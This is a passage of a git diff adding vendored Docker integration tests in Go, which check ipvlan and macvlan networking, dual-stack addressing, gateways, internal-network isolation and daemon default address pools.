+			container.WithIPv4(netName, "172.28.230.10"),
+		)
+
+		timeoutCtx, cancel := context.WithTimeout(context.Background(), 1*time.Second)
+		defer cancel()
+		_, err := container.Exec(timeoutCtx, client, id1, []string{"ping", "-c", "1", "-w", "1", "8.8.8.8"})
+		// FIXME(vdemeester) check the time of error ?
+		assert.Check(t, err != nil)
+		assert.Check(t, timeoutCtx.Err() == context.DeadlineExceeded)
+
+		_, err = container.Exec(ctx, client, id2, []string{"ping", "-c", "1", id1})
+		assert.NilError(t, err)
+	}
+}
+
+func testIpvlanL2MultiSubnet(client dclient.APIClient) func(*testing.T) {
+	return func(t *testing.T) {
+		netName := "dualstackl2"
+		net.CreateNoError(t, context.Background(), client, netName,
+			net.WithIPvlan("", ""),
+			net.WithIPv6(),
+			net.WithIPAM("172.28.200.0/24", ""),
+			net.WithIPAM("172.28.202.0/24", "172.28.202.254"),
+			net.WithIPAM("2001:db8:abc8::/64", ""),
+			net.WithIPAM("2001:db8:abc6::/64", "2001:db8:abc6::254"),
+		)
+		assert.Check(t, n.IsNetworkAvailable(client, netName))
+
+		// start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.100.0/24 and 2001:db8:abc2::/64
+		ctx := context.Background()
+		id1 := container.Run(t, ctx, client,
+			container.WithNetworkMode(netName),
+			container.WithIPv4(netName, "172.28.200.20"),
+			container.WithIPv6(netName, "2001:db8:abc8::20"),
+		)
+		id2 := container.Run(t, ctx, client,
+			container.WithNetworkMode(netName),
+			container.WithIPv4(netName, "172.28.200.21"),
+			container.WithIPv6(netName, "2001:db8:abc8::21"),
+		)
+		c1, err := client.ContainerInspect(ctx, id1)
+		assert.NilError(t, err)
+
+		// verify ipv4 connectivity to the explicit --ipv address second to first
+		_, err = container.Exec(ctx, client, id2, []string{"ping", "-c", "1", c1.NetworkSettings.Networks[netName].IPAddress})
+		assert.NilError(t, err)
+		// verify ipv6 connectivity to the explicit --ipv6 address second to first
+		_, err = container.Exec(ctx, client, id2, []string{"ping6", "-c", "1", c1.NetworkSettings.Networks[netName].GlobalIPv6Address})
+		assert.NilError(t, err)
+
+		// start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.102.0/24 and 2001:db8:abc4::/64
+		id3 := container.Run(t, ctx, client,
+			container.WithNetworkMode(netName),
+			container.WithIPv4(netName, "172.28.202.20"),
+			container.WithIPv6(netName, "2001:db8:abc6::20"),
+		)
+		id4 := container.Run(t, ctx, client,
+			container.WithNetworkMode(netName),
+			container.WithIPv4(netName, "172.28.202.21"),
+			container.WithIPv6(netName, "2001:db8:abc6::21"),
+		)
+		c3, err := client.ContainerInspect(ctx, id3)
+		assert.NilError(t, err)
+
+		// verify ipv4 connectivity to the explicit --ipv address from third to fourth
+		_, err = container.Exec(ctx, client, id4, []string{"ping", "-c", "1", c3.NetworkSettings.Networks[netName].IPAddress})
+		assert.NilError(t, err)
+		// verify ipv6 connectivity to the explicit --ipv6 address from third to fourth
+		_, err = container.Exec(ctx, client, id4, []string{"ping6", "-c", "1", c3.NetworkSettings.Networks[netName].GlobalIPv6Address})
+		assert.NilError(t, err)
+
+		// Inspect the v4 gateway to ensure the proper default GW was assigned
+		assert.Equal(t, c1.NetworkSettings.Networks[netName].Gateway, "172.28.200.1")
+		// Inspect the v6 gateway to ensure the proper default GW was assigned
+		assert.Equal(t, c1.NetworkSettings.Networks[netName].IPv6Gateway, "2001:db8:abc8::1")
+		// Inspect the v4 gateway to ensure the proper explicitly assigned default GW was assigned
+		assert.Equal(t, c3.NetworkSettings.Networks[netName].Gateway, "172.28.202.254")
+		// Inspect the v6 gateway to ensure the proper explicitly assigned default GW was assigned
+		assert.Equal(t, c3.NetworkSettings.Networks[netName].IPv6Gateway, "2001:db8:abc6::254")
+	}
+}
+
+func testIpvlanL3MultiSubnet(client dclient.APIClient) func(*testing.T) {
+	return func(t *testing.T) {
+		netName := "dualstackl3"
+		net.CreateNoError(t, context.Background(), client, netName,
+			net.WithIPvlan("", "l3"),
+			net.WithIPv6(),
+			net.WithIPAM("172.28.10.0/24", ""),
+			net.WithIPAM("172.28.12.0/24", "172.28.12.254"),
+			net.WithIPAM("2001:db8:abc9::/64", ""),
+			net.WithIPAM("2001:db8:abc7::/64", "2001:db8:abc7::254"),
+		)
+		assert.Check(t, n.IsNetworkAvailable(client, netName))
+
+		// start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.100.0/24 and 2001:db8:abc2::/64
+		ctx := context.Background()
+		id1 := container.Run(t, ctx, client,
+			container.WithNetworkMode(netName),
+			container.WithIPv4(netName, "172.28.10.20"),
+			container.WithIPv6(netName, "2001:db8:abc9::20"),
+		)
+		id2 := container.Run(t, ctx, client,
+			container.WithNetworkMode(netName),
+			container.WithIPv4(netName, "172.28.10.21"),
+			container.WithIPv6(netName, "2001:db8:abc9::21"),
+		)
+		c1, err := client.ContainerInspect(ctx, id1)
+		assert.NilError(t, err)
+
+		// verify ipv4 connectivity to the explicit --ipv address second to first
+		_, err = container.Exec(ctx, client, id2, []string{"ping", "-c", "1", c1.NetworkSettings.Networks[netName].IPAddress})
+		assert.NilError(t, err)
+		// verify ipv6 connectivity to the explicit --ipv6 address second to first
+		_, err = container.Exec(ctx, client, id2, []string{"ping6", "-c", "1", c1.NetworkSettings.Networks[netName].GlobalIPv6Address})
+		assert.NilError(t, err)
+
+		// start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.102.0/24 and 2001:db8:abc4::/64
+		id3 := container.Run(t, ctx, client,
+			container.WithNetworkMode(netName),
+			container.WithIPv4(netName, "172.28.12.20"),
+			container.WithIPv6(netName, "2001:db8:abc7::20"),
+		)
+		id4 := container.Run(t, ctx, client,
+			container.WithNetworkMode(netName),
+			container.WithIPv4(netName, "172.28.12.21"),
+			container.WithIPv6(netName, "2001:db8:abc7::21"),
+		)
+		c3, err := client.ContainerInspect(ctx, id3)
+		assert.NilError(t, err)
+
+		// verify ipv4 connectivity to the explicit --ipv address from third to fourth
+		_, err = container.Exec(ctx, client, id4, []string{"ping", "-c", "1", c3.NetworkSettings.Networks[netName].IPAddress})
+		assert.NilError(t, err)
+		// verify ipv6 connectivity to the explicit --ipv6 address from third to fourth
+		_, err = container.Exec(ctx, client, id4, []string{"ping6", "-c", "1", c3.NetworkSettings.Networks[netName].GlobalIPv6Address})
+		assert.NilError(t, err)
+
+		// Inspect the v4 gateway to ensure no next hop is assigned in L3 mode
+		assert.Equal(t, c1.NetworkSettings.Networks[netName].Gateway, "")
+		// Inspect the v6 gateway to ensure the explicitly specified default GW is ignored per L3 mode enabled
+		assert.Equal(t, c1.NetworkSettings.Networks[netName].IPv6Gateway, "")
+		// Inspect the v4 gateway to ensure no next hop is assigned in L3 mode
+		assert.Equal(t, c3.NetworkSettings.Networks[netName].Gateway, "")
+		// Inspect the v6 gateway to ensure the explicitly specified default GW is ignored per L3 mode enabled
+		assert.Equal(t, c3.NetworkSettings.Networks[netName].IPv6Gateway, "")
+	}
+}
+
+func testIpvlanAddressing(client dclient.APIClient) func(*testing.T) {
+	return func(t *testing.T) {
+		// Verify ipvlan l2 mode sets the proper default gateway routes via netlink
+		// for either an explicitly set route by the user or inferred via default IPAM
+		netNameL2 := "dualstackl2"
+		net.CreateNoError(t, context.Background(), client, netNameL2,
+			net.WithIPvlan("", "l2"),
+			net.WithIPv6(),
+			net.WithIPAM("172.28.140.0/24", "172.28.140.254"),
+			net.WithIPAM("2001:db8:abcb::/64", ""),
+		)
+		assert.Check(t, n.IsNetworkAvailable(client, netNameL2))
+
+		ctx := context.Background()
+		id1 := container.Run(t, ctx, client,
+			container.WithNetworkMode(netNameL2),
+		)
+		// Validate ipvlan l2 mode defaults gateway sets the default IPAM next-hop inferred from the subnet
+		result, err := container.Exec(ctx, client, id1, []string{"ip", "route"})
+		assert.NilError(t, err)
+		assert.Check(t, strings.Contains(result.Combined(), "default via 172.28.140.254 dev eth0"))
+		// Validate ipvlan l2 mode sets the v6 gateway to the user specified default gateway/next-hop
+		result, err = container.Exec(ctx, client, id1, []string{"ip", "-6", "route"})
+		assert.NilError(t, err)
+		assert.Check(t, strings.Contains(result.Combined(), "default via 2001:db8:abcb::1 dev eth0"))
+
+		// Validate ipvlan l3 mode sets the v4 gateway to dev eth0 and disregards any explicit or inferred next-hops
+		netNameL3 := "dualstackl3"
+		net.CreateNoError(t, context.Background(), client, netNameL3,
+			net.WithIPvlan("", "l3"),
+			net.WithIPv6(),
+			net.WithIPAM("172.28.160.0/24", "172.28.160.254"),
+			net.WithIPAM("2001:db8:abcd::/64", "2001:db8:abcd::254"),
+		)
+		assert.Check(t, n.IsNetworkAvailable(client, netNameL3))
+
+		id2 := container.Run(t, ctx, client,
+			container.WithNetworkMode(netNameL3),
+		)
+		// Validate ipvlan l3 mode sets the v4 gateway to dev eth0 and disregards any explicit or inferred next-hops
+		result, err = container.Exec(ctx, client, id2, []string{"ip", "route"})
+		assert.NilError(t, err)
+		assert.Check(t, strings.Contains(result.Combined(), "default dev eth0"))
+		// Validate ipvlan l3 mode sets the v6 gateway to dev eth0 and disregards any explicit or inferred next-hops
+		result, err = container.Exec(ctx, client, id2, []string{"ip", "-6", "route"})
+		assert.NilError(t, err)
+		assert.Check(t, strings.Contains(result.Combined(), "default dev eth0"))
+	}
+}
+
+// ensure Kernel version is >= v4.2 for ipvlan support
+func ipvlanKernelSupport() bool {
+	return n.CheckKernelMajorVersionGreaterOrEqualThen(4, 2)
+}
diff --git a/vendor/github.com/docker/docker/integration/network/ipvlan/main_test.go b/vendor/github.com/docker/docker/integration/network/ipvlan/main_test.go
new file mode 100644
index 0000000000..2d5f62453c
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/network/ipvlan/main_test.go
@@ -0,0 +1,33 @@
+package ipvlan // import "github.com/docker/docker/integration/network/ipvlan"
+
+import (
+	"fmt"
+	"os"
+	"testing"
+
+	"github.com/docker/docker/internal/test/environment"
+)
+
+var testEnv *environment.Execution
+
+func TestMain(m *testing.M) {
+	var err error
+	testEnv, err = environment.New()
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+	err = environment.EnsureFrozenImagesLinux(testEnv)
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+
+	testEnv.Print()
+	os.Exit(m.Run())
+}
+
+func setupTest(t *testing.T) func() {
+	environment.ProtectAll(t, testEnv)
+	return func() { testEnv.Clean(t) }
+}
diff --git a/vendor/github.com/docker/docker/integration/network/macvlan/macvlan_test.go b/vendor/github.com/docker/docker/integration/network/macvlan/macvlan_test.go
new file mode 100644
index 0000000000..14dfce92cb
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/network/macvlan/macvlan_test.go
@@ -0,0 +1,282 @@
+package macvlan
+
+import (
+	"context"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration/internal/container"
+	net "github.com/docker/docker/integration/internal/network"
+	n "github.com/docker/docker/integration/network"
+	"github.com/docker/docker/internal/test/daemon"
+	"gotest.tools/assert"
+	"gotest.tools/skip"
+)
+
+func TestDockerNetworkMacvlanPersistance(t *testing.T) {
+	// verify the driver automatically provisions the 802.1q link (dm-dummy0.60)
+	skip.If(t, testEnv.DaemonInfo.OSType != "linux")
+	skip.If(t, testEnv.IsRemoteDaemon())
+	skip.If(t, !macvlanKernelSupport(), "Kernel doesn't support macvlan")
+
+	d := daemon.New(t)
+	d.StartWithBusybox(t)
+	defer d.Stop(t)
+
+	master := "dm-dummy0"
+	n.CreateMasterDummy(t, master)
+	defer n.DeleteInterface(t, master)
+
+	client, err := d.NewClient()
+	assert.NilError(t, err)
+
+	netName := "dm-persist"
+	net.CreateNoError(t, context.Background(), client, netName,
+		net.WithMacvlan("dm-dummy0.60"),
+	)
+	assert.Check(t, n.IsNetworkAvailable(client, netName))
+	d.Restart(t)
+	assert.Check(t, n.IsNetworkAvailable(client, netName))
+}
+
+func TestDockerNetworkMacvlan(t *testing.T) {
+	skip.If(t, testEnv.DaemonInfo.OSType != "linux")
+	skip.If(t, testEnv.IsRemoteDaemon())
+	skip.If(t, !macvlanKernelSupport(), "Kernel doesn't support macvlan")
+
+	for _, tc := range []struct {
+		name string
+		test func(client.APIClient) func(*testing.T)
+	}{
+		{
+			name: "Subinterface",
+			test: testMacvlanSubinterface,
+		}, {
+			name: "OverlapParent",
+			test: testMacvlanOverlapParent,
+		}, {
+			name: "NilParent",
+			test: testMacvlanNilParent,
+		}, {
+			name: "InternalMode",
+			test: testMacvlanInternalMode,
+		}, {
+			name: "Addressing",
+			test: testMacvlanAddressing,
+		},
+	} {
+		d := daemon.New(t)
+		d.StartWithBusybox(t)
+
+		client, err := d.NewClient()
+		assert.NilError(t, err)
+
+		t.Run(tc.name, tc.test(client))
+
+		d.Stop(t)
+		// FIXME(vdemeester) clean network
+	}
+}
+
+func testMacvlanOverlapParent(client client.APIClient) func(*testing.T) {
+	return func(t *testing.T) {
+		// verify the same parent interface cannot be used if already in use by an existing network
+		master := "dm-dummy0"
+		n.CreateMasterDummy(t, master)
+		defer n.DeleteInterface(t, master)
+
+		netName := "dm-subinterface"
+		parentName := "dm-dummy0.40"
+		net.CreateNoError(t, context.Background(), client, netName,
+			net.WithMacvlan(parentName),
+		)
+		assert.Check(t, n.IsNetworkAvailable(client, netName))
+
+		_, err := net.Create(context.Background(), client, "dm-parent-net-overlap",
+			net.WithMacvlan(parentName),
+		)
+		assert.Check(t, err != nil)
+
+		// delete the network while preserving the parent link
+		err = client.NetworkRemove(context.Background(), netName)
+		assert.NilError(t, err)
+
+		assert.Check(t, n.IsNetworkNotAvailable(client, netName))
+		// verify the network delete did not delete the predefined link
+		n.LinkExists(t, master)
+	}
+}
+
+func testMacvlanSubinterface(client client.APIClient) func(*testing.T) {
+	return func(t *testing.T) {
+		// verify the same parent interface cannot be used if already in use by an existing network
+		master := "dm-dummy0"
+		parentName := "dm-dummy0.20"
+		n.CreateMasterDummy(t, master)
+		defer n.DeleteInterface(t, master)
+		n.CreateVlanInterface(t, master, parentName, "20")
+
+		netName := "dm-subinterface"
+		net.CreateNoError(t, context.Background(), client, netName,
+			net.WithMacvlan(parentName),
+		)
+		assert.Check(t, n.IsNetworkAvailable(client, netName))
+
+		// delete the network while preserving the parent link
+		err := client.NetworkRemove(context.Background(), netName)
+		assert.NilError(t, err)
+
+		assert.Check(t, n.IsNetworkNotAvailable(client, netName))
+		// verify the network delete did not delete the predefined link
+		n.LinkExists(t, parentName)
+	}
+}
+
+func testMacvlanNilParent(client client.APIClient) func(*testing.T) {
+	return func(t *testing.T) {
+		// macvlan bridge mode - dummy parent interface is provisioned dynamically
+		_, err := client.NetworkCreate(context.Background(), "dm-nil-parent", types.NetworkCreate{
+			Driver: "macvlan",
+		})
+		assert.NilError(t, err)
+		assert.Check(t, n.IsNetworkAvailable(client, "dm-nil-parent"))
+
+		ctx := context.Background()
+		id1 := container.Run(t, ctx, client, container.WithNetworkMode("dm-nil-parent"))
+		id2 := container.Run(t, ctx, client, container.WithNetworkMode("dm-nil-parent"))
+
+		_, err = container.Exec(ctx, client, id2, []string{"ping", "-c", "1", id1})
+		assert.Check(t, err == nil)
+	}
+}
+
+func testMacvlanInternalMode(client client.APIClient) func(*testing.T) {
+	return func(t *testing.T) {
+		// macvlan bridge mode - dummy parent interface is provisioned dynamically
+		_, err := client.NetworkCreate(context.Background(), "dm-internal", types.NetworkCreate{
+			Driver:   "macvlan",
+			Internal: true,
+		})
+		assert.NilError(t, err)
+		assert.Check(t, n.IsNetworkAvailable(client, "dm-internal"))
+
+		ctx := context.Background()
+		id1 := container.Run(t, ctx, client, container.WithNetworkMode("dm-internal"))
+		id2 := container.Run(t, ctx, client, container.WithNetworkMode("dm-internal"))
+
+		timeoutCtx, cancel := context.WithTimeout(context.Background(), 1*time.Second)
+		defer cancel()
+		_, err = container.Exec(timeoutCtx, client, id1, []string{"ping", "-c", "1", "-w", "1", "8.8.8.8"})
+		// FIXME(vdemeester) check the time of error ?
+		assert.Check(t, err != nil)
+		assert.Check(t, timeoutCtx.Err() == context.DeadlineExceeded)
+
+		_, err = container.Exec(ctx, client, id2, []string{"ping", "-c", "1", id1})
+		assert.Check(t, err == nil)
+	}
+}
+
+func testMacvlanMultiSubnet(client client.APIClient) func(*testing.T) {
+	return func(t *testing.T) {
+		netName := "dualstackbridge"
+		net.CreateNoError(t, context.Background(), client, netName,
+			net.WithMacvlan(""),
+			net.WithIPv6(),
+			net.WithIPAM("172.28.100.0/24", ""),
+			net.WithIPAM("172.28.102.0/24", "172.28.102.254"),
+			net.WithIPAM("2001:db8:abc2::/64", ""),
+			net.WithIPAM("2001:db8:abc4::/64", "2001:db8:abc4::254"),
+		)
+
+		assert.Check(t, n.IsNetworkAvailable(client, netName))
+
+		// start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.100.0/24 and 2001:db8:abc2::/64
+		ctx := context.Background()
+		id1 := container.Run(t, ctx, client,
+			container.WithNetworkMode("dualstackbridge"),
+			container.WithIPv4("dualstackbridge", "172.28.100.20"),
+			container.WithIPv6("dualstackbridge", "2001:db8:abc2::20"),
+		)
+		id2 := container.Run(t, ctx, client,
+			container.WithNetworkMode("dualstackbridge"),
+			container.WithIPv4("dualstackbridge", "172.28.100.21"),
+			container.WithIPv6("dualstackbridge", "2001:db8:abc2::21"),
+		)
+		c1, err := client.ContainerInspect(ctx, id1)
+		assert.NilError(t, err)
+
+		// verify ipv4 connectivity to the explicit --ipv address second to first
+		_, err = container.Exec(ctx, client, id2, []string{"ping", "-c", "1", c1.NetworkSettings.Networks["dualstackbridge"].IPAddress})
+		assert.NilError(t, err)
+		// verify ipv6 connectivity to the explicit --ipv6 address second to first
+		_, err = container.Exec(ctx, client, id2, []string{"ping6", "-c", "1", c1.NetworkSettings.Networks["dualstackbridge"].GlobalIPv6Address})
+		assert.NilError(t, err)
+
+		// start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.102.0/24 and 2001:db8:abc4::/64
+		id3 := container.Run(t, ctx, client,
+			container.WithNetworkMode("dualstackbridge"),
+			container.WithIPv4("dualstackbridge", "172.28.102.20"),
+			container.WithIPv6("dualstackbridge", "2001:db8:abc4::20"),
+		)
+		id4 := container.Run(t, ctx, client,
+			container.WithNetworkMode("dualstackbridge"),
+			container.WithIPv4("dualstackbridge", "172.28.102.21"),
+			container.WithIPv6("dualstackbridge", "2001:db8:abc4::21"),
+		)
+		c3, err := client.ContainerInspect(ctx, id3)
+		assert.NilError(t, err)
+
+		// verify ipv4 connectivity to the explicit --ipv address from third to fourth
+		_, err = container.Exec(ctx, client, id4, []string{"ping", "-c", "1", c3.NetworkSettings.Networks["dualstackbridge"].IPAddress})
+		assert.NilError(t, err)
+		// verify ipv6 connectivity to the explicit --ipv6 address from third to fourth
+		_, err = container.Exec(ctx, client, id4, []string{"ping6", "-c", "1", c3.NetworkSettings.Networks["dualstackbridge"].GlobalIPv6Address})
+		assert.NilError(t, err)
+
+		// Inspect the v4 gateway to ensure the proper default GW was assigned
+		assert.Equal(t, c1.NetworkSettings.Networks["dualstackbridge"].Gateway, "172.28.100.1")
+		// Inspect the v6 gateway to ensure the proper default GW was assigned
+		assert.Equal(t, c1.NetworkSettings.Networks["dualstackbridge"].IPv6Gateway, "2001:db8:abc2::1")
+		// Inspect the v4 gateway to ensure the proper explicitly assigned default GW was assigned
+		assert.Equal(t, c3.NetworkSettings.Networks["dualstackbridge"].Gateway, "172.28.102.254")
+		// Inspect the v6 gateway to ensure the proper explicitly assigned default GW was assigned
+		assert.Equal(t, c3.NetworkSettings.Networks["dualstackbridge"].IPv6Gateway, "2001:db8.abc4::254")
+	}
+}
+
+func testMacvlanAddressing(client client.APIClient) func(*testing.T) {
+	return func(t *testing.T) {
+		// Ensure the default gateways, next-hops and default dev devices are properly set
+		netName := "dualstackbridge"
+		net.CreateNoError(t, context.Background(), client, netName,
+			net.WithMacvlan(""),
+			net.WithIPv6(),
+			net.WithOption("macvlan_mode", "bridge"),
+			net.WithIPAM("172.28.130.0/24", ""),
+			net.WithIPAM("2001:db8:abca::/64", "2001:db8:abca::254"),
+		)
+		assert.Check(t, n.IsNetworkAvailable(client, netName))
+
+		ctx := context.Background()
+		id1 := container.Run(t, ctx, client,
+			container.WithNetworkMode("dualstackbridge"),
+		)
+
+		// Validate macvlan bridge mode defaults gateway sets the default IPAM next-hop inferred from the subnet
+		result, err := container.Exec(ctx, client, id1, []string{"ip", "route"})
+		assert.NilError(t, err)
+		assert.Check(t, strings.Contains(result.Combined(), "default via 172.28.130.1 dev eth0"))
+		// Validate macvlan bridge mode sets the v6 gateway to the user specified default gateway/next-hop
+		result, err = container.Exec(ctx, client, id1, []string{"ip", "-6", "route"})
+		assert.NilError(t, err)
+		assert.Check(t, strings.Contains(result.Combined(), "default via 2001:db8:abca::254 dev eth0"))
+	}
+}
+
+// ensure Kernel version is >= v3.9 for macvlan support
+func macvlanKernelSupport() bool {
+	return n.CheckKernelMajorVersionGreaterOrEqualThen(3, 9)
+}
diff --git a/vendor/github.com/docker/docker/integration/network/macvlan/main_test.go b/vendor/github.com/docker/docker/integration/network/macvlan/main_test.go
new file mode 100644
index 0000000000..31cf111b22
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/network/macvlan/main_test.go
@@ -0,0 +1,33 @@
+package macvlan // import "github.com/docker/docker/integration/network/macvlan"
+
+import (
+	"fmt"
+	"os"
+	"testing"
+
+	"github.com/docker/docker/internal/test/environment"
+)
+
+var testEnv *environment.Execution
+
+func TestMain(m *testing.M) {
+	var err error
+	testEnv, err = environment.New()
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+	err = environment.EnsureFrozenImagesLinux(testEnv)
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+
+	testEnv.Print()
+	os.Exit(m.Run())
+}
+
+func setupTest(t *testing.T) func() {
+	environment.ProtectAll(t, testEnv)
+	return func() { testEnv.Clean(t) }
+}
diff --git a/vendor/github.com/docker/docker/integration/network/main_test.go b/vendor/github.com/docker/docker/integration/network/main_test.go
new file mode 100644
index 0000000000..36ed19ca67
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/network/main_test.go
@@ -0,0 +1,33 @@
+package network // import "github.com/docker/docker/integration/network"
+
+import (
+	"fmt"
+	"os"
+	"testing"
+
+	"github.com/docker/docker/internal/test/environment"
+)
+
+var testEnv *environment.Execution
+
+func TestMain(m *testing.M) {
+	var err error
+	testEnv, err = environment.New()
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+	err = environment.EnsureFrozenImagesLinux(testEnv)
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+
+	testEnv.Print()
+	os.Exit(m.Run())
+}
+
+func setupTest(t *testing.T) func() {
+	environment.ProtectAll(t, testEnv)
+	return func() { testEnv.Clean(t) }
+}
diff --git a/vendor/github.com/docker/docker/integration/network/service_test.go b/vendor/github.com/docker/docker/integration/network/service_test.go
new file mode 100644
index 0000000000..d926045b72
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/network/service_test.go
@@ -0,0 +1,315 @@
+package network // import "github.com/docker/docker/integration/network"
+
+import (
+	"context"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	swarmtypes "github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration/internal/network"
+	"github.com/docker/docker/integration/internal/swarm"
+	"github.com/docker/docker/internal/test/daemon"
+	"gotest.tools/assert"
+	"gotest.tools/icmd"
+	"gotest.tools/poll"
+	"gotest.tools/skip"
+)
+
+// delInterface removes given network interface
+func delInterface(t *testing.T, ifName string) {
+	icmd.RunCommand("ip", "link", "delete", ifName).Assert(t, icmd.Success)
+	icmd.RunCommand("iptables", "-t", "nat", "--flush").Assert(t, icmd.Success)
+	icmd.RunCommand("iptables", "--flush").Assert(t, icmd.Success)
+}
+
+func TestDaemonRestartWithLiveRestore(t *testing.T) {
+	skip.If(t, testEnv.IsRemoteDaemon())
+	skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.38"), "skip test from new feature")
+	d := daemon.New(t)
+	defer d.Stop(t)
+	d.Start(t)
+	d.Restart(t, "--live-restore=true",
+		"--default-address-pool", "base=175.30.0.0/16,size=16",
+		"--default-address-pool", "base=175.33.0.0/16,size=24")
+
+	// Verify bridge network's subnet
+	cli, err := d.NewClient()
+	assert.Assert(t, err)
+	defer cli.Close()
+	out, err := cli.NetworkInspect(context.Background(), "bridge", types.NetworkInspectOptions{})
+	assert.NilError(t, err)
+	// Make sure docker0 doesn't get override with new IP in live restore case
+	assert.Equal(t, out.IPAM.Config[0].Subnet, "172.18.0.0/16")
+}
+
+func TestDaemonDefaultNetworkPools(t *testing.T) {
+	// Remove docker0 bridge and the start daemon defining the predefined address pools
+	skip.If(t, testEnv.IsRemoteDaemon())
+	skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.38"), "skip test from new feature")
+	defaultNetworkBridge := "docker0"
+	delInterface(t, defaultNetworkBridge)
+	d := daemon.New(t)
+	defer d.Stop(t)
+	d.Start(t,
+		"--default-address-pool", "base=175.30.0.0/16,size=16",
+		"--default-address-pool", "base=175.33.0.0/16,size=24")
+
+	// Verify bridge network's subnet
+	cli, err := d.NewClient()
+	assert.Assert(t, err)
+	defer cli.Close()
+	out, err := cli.NetworkInspect(context.Background(), "bridge", types.NetworkInspectOptions{})
+	assert.NilError(t, err)
+	assert.Equal(t, out.IPAM.Config[0].Subnet, "175.30.0.0/16")
+
+	// Create a bridge network and verify its subnet is the second default pool
+	name := "elango"
+	network.CreateNoError(t, context.Background(), cli, name,
+		network.WithDriver("bridge"),
+	)
+	out, err = cli.NetworkInspect(context.Background(), name, types.NetworkInspectOptions{})
+	assert.NilError(t, err)
+	assert.Equal(t, out.IPAM.Config[0].Subnet, "175.33.0.0/24")
+
+	// Create a bridge network and verify its subnet is the third default pool
+	name = "saanvi"
+	network.CreateNoError(t, context.Background(), cli, name,
+		network.WithDriver("bridge"),
+	)
+	out, err = cli.NetworkInspect(context.Background(), name, types.NetworkInspectOptions{})
+	assert.NilError(t, err)
+	assert.Equal(t, out.IPAM.Config[0].Subnet, "175.33.1.0/24")
+	delInterface(t, defaultNetworkBridge)
+
+}
+
+func TestDaemonRestartWithExistingNetwork(t *testing.T) {
+	skip.If(t, testEnv.IsRemoteDaemon())
+	skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.38"), "skip test from new feature")
+	defaultNetworkBridge := "docker0"
+	d := daemon.New(t)
+	d.Start(t)
+	defer d.Stop(t)
+	// Verify bridge network's subnet
+	cli, err := d.NewClient()
+	assert.Assert(t, err)
+	defer cli.Close()
+
+	// Create a bridge network
+	name := "elango"
+	network.CreateNoError(t, context.Background(), cli, name,
+		network.WithDriver("bridge"),
+	)
+	out, err := cli.NetworkInspect(context.Background(), name, types.NetworkInspectOptions{})
+	assert.NilError(t, err)
+	networkip := out.IPAM.Config[0].Subnet
+
+	// Restart daemon with default address pool option
+	d.Restart(t,
+		"--default-address-pool", "base=175.30.0.0/16,size=16",
+		"--default-address-pool", "base=175.33.0.0/16,size=24")
+
+	out1, err := cli.NetworkInspect(context.Background(), name, types.NetworkInspectOptions{})
+	assert.NilError(t, err)
+	assert.Equal(t, out1.IPAM.Config[0].Subnet, networkip)
+	delInterface(t, defaultNetworkBridge)
+}
+
+func TestDaemonRestartWithExistingNetworkWithDefaultPoolRange(t *testing.T) {
+	skip.If(t, testEnv.IsRemoteDaemon())
+	skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.38"), "skip test from new feature")
+	defaultNetworkBridge := "docker0"
+	d := daemon.New(t)
+	d.Start(t)
+	defer d.Stop(t)
+	// Verify bridge network's subnet
+	cli, err := d.NewClient()
+	assert.Assert(t, err)
+	defer cli.Close()
+
+	// Create a bridge network
+	name := "elango"
+	network.CreateNoError(t, context.Background(), cli, name,
+		network.WithDriver("bridge"),
+	)
+	out, err := cli.NetworkInspect(context.Background(), name, types.NetworkInspectOptions{})
+	assert.NilError(t, err)
+	networkip := out.IPAM.Config[0].Subnet
+
+	// Create a bridge network
+	name = "sthira"
+	network.CreateNoError(t, context.Background(), cli, name,
+		network.WithDriver("bridge"),
+	)
+	out, err = cli.NetworkInspect(context.Background(), name, types.NetworkInspectOptions{})
+	assert.NilError(t, err)
+	networkip2 := out.IPAM.Config[0].Subnet
+
+	// Restart daemon with default address pool option
+	d.Restart(t,
+		"--default-address-pool", "base=175.18.0.0/16,size=16",
+		"--default-address-pool", "base=175.19.0.0/16,size=24")
+
+	// Create a bridge network
+	name = "saanvi"
+	network.CreateNoError(t, context.Background(), cli, name,
+		network.WithDriver("bridge"),
+	)
+	out1, err := cli.NetworkInspect(context.Background(), name, types.NetworkInspectOptions{})
+	assert.NilError(t, err)
+
+	assert.Check(t, out1.IPAM.Config[0].Subnet != networkip)
+	assert.Check(t, out1.IPAM.Config[0].Subnet != networkip2)
+	delInterface(t, defaultNetworkBridge)
+}
+
+func TestDaemonWithBipAndDefaultNetworkPool(t *testing.T) {
+	skip.If(t, testEnv.IsRemoteDaemon())
+	skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.38"), "skip test from new feature")
+	defaultNetworkBridge := "docker0"
+	d := daemon.New(t)
+	defer d.Stop(t)
+	d.Start(t, "--bip=172.60.0.1/16",
+		"--default-address-pool", "base=175.30.0.0/16,size=16",
+		"--default-address-pool", "base=175.33.0.0/16,size=24")
+
+	// Verify bridge network's subnet
+	cli, err := d.NewClient()
